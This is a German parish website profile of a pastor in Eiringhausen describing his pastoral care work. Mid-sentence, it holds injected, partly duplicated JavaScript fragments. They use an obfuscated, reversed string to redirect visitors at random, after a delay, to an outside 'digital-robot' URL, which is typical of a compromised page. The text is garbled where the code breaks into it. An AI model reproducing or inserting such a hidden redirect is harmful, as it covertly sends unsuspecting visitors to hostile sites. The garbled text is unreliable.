Gemeindeleben

Dirk Gogarn

Seit fast sieben Jahren als Pfarrer in Eiringhausen …ggggg

dirk_gogarn2
54 Jahre, seit sieben Jahren als Pfarrer in Eiringhausen
Pasdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tor bin ich immer noch und immer wieder seit über 20 Jahren.
Menschen in den Höhen und Tiefen ihres Lebens begleiten zu dürfen, ist meine Lebensaufgabe. Gottes in der Bibel bezeugte Frohe Botschaft gilt allen Menschen. „Vor Gott gilt kein Ansehen der Person.“ Dieser Vers aus dem Neuen Testament ist dabei für mich ein Leitmotiv.
In der Kirchengemeinde Eiringhausen bin ich nun seit fast sieben Jahren mit halber Stelle. Mein Schwerpunkt ist die Seelsorge, gerade auch bei Menschen, die in die Jahre kommen.
Über die Wertschätzung, die ich von Gemeinde, Presbyterium und auch den Kollegen erfahre, freue ich mich sehr. An Lenne und Else lässt es sich gut leben und arbeiten.